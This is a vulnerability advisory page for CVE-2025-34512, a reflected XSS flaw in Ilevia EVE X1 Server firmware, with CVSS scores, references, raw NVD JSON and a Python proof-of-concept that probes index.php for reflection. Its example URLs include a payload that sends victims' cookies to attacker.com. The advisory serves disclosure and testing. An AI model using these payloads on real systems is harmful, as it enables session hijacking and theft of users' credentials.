Security Vulnerability Report
CVE-2025-34512 CVSS 6.1 MEDIUM

CVE-2025-34512

Published: 2025-10-16 18:15:35
Last Modified: 2025-10-23 19:33:42

Description

Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain a reflected cross-site scripting (XSS) vulnerability in index.php that allows an unauthenticated attacker to execute arbitrary code. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ilevia EVE X1 Server firmware ≤ 4.7.18.0.eden

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-34512 - Ilevia EVE X1 Server Reflected XSS PoC
# Vulnerability: Reflected XSS in index.php
# Affected: Ilevia EVE X1 Server firmware <= 4.7.18.0.eden
# Author: VulnCheck / Zero Science Lab
import requests
import sys

TARGET_URL = "http://TARGET_HOST:8080/index.php"


def generate_poc_url(target, param="page", payload=None):
    """Generate malicious URL with XSS payload reflected in index.php"""
    if payload is None:
        # Default payload to demonstrate cookie theft
        payload = '<script>alert(document.cookie)</script>'
    malicious_url = f"{target}?{param}={payload}"
    return malicious_url


def exploit_xss(target_url):
    """Send the crafted XSS request and verify reflection"""
    payload = '<script>alert("XSS-CVE-2025-34512")</script>'
    params = {"page": payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if payload in response.text:
            print("[+] XSS payload reflected successfully!")
            print(f"[+] Vulnerable URL: {response.url}")
            return True
        else:
            print("[-] Payload not reflected. Target may not be vulnerable.")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = f"http://{sys.argv[1]}:8080/index.php"
    poc_url = generate_poc_url(TARGET_URL)
    print(f"[*] Generated PoC URL: {poc_url}")
    exploit_xss(TARGET_URL)

# Example malicious URL:
# http://VICTIM_IP:8080/index.php?page=<script>alert(document.cookie)</script>
# http://VICTIM_IP:8080/index.php?page=<img src=x onerror=alert(1)>
# http://VICTIM_IP:8080/index.php?redirect=<script>document.location='http://attacker.com/?c='+document.cookie</script>

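References

https://www.ilevia.com/ (Product)
https://www.vulncheck.com/advisories/ilevia-eve-x1-server-reflected-xss (Third Party Advisory)
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5961.php (Exploit, Third Party Advisory)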

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34512", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:35.447", "lastModified": "2025-10-23T19:33:42.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain a reflected cross-site scripting (XSS) vulnerability in index.php that allows an unauthenticated attacker to execute arbitrary code. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://www.ilevia.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ilevia-eve-x1-server-reflected-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5961.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}